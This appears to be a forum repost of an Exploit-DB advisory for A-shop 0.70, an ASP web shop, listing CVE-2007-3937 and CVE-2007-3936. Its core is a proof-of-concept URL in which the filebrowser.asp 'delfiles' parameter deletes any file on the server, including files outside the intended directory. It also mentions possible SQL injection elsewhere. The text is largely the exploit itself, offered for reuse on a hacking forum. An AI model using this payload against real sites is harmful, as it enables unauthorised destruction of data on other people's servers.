Exploit A-shop 0.70 - Remote File Deletion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4198
Проверка EDB
  1. Пройдено
Автор
TIMQ
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2007-3937 cve-2007-3936
Дата публикации
2007-07-18
Код:
A-shop <=0.70 Multiple vulnerabilities

Found Bug: Timq
site:http://private-node.net
email:[email protected]


Vendor:http://www.rammdev.com/ashop/

PoC:
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]

It is possible to delete not only the files in the folders listed,
but also ouside its directory.
Also possible sql injections in other areas.

# milw0rm.com [2007-07-18]
 
Источник
www.exploit-db.com

Похожие темы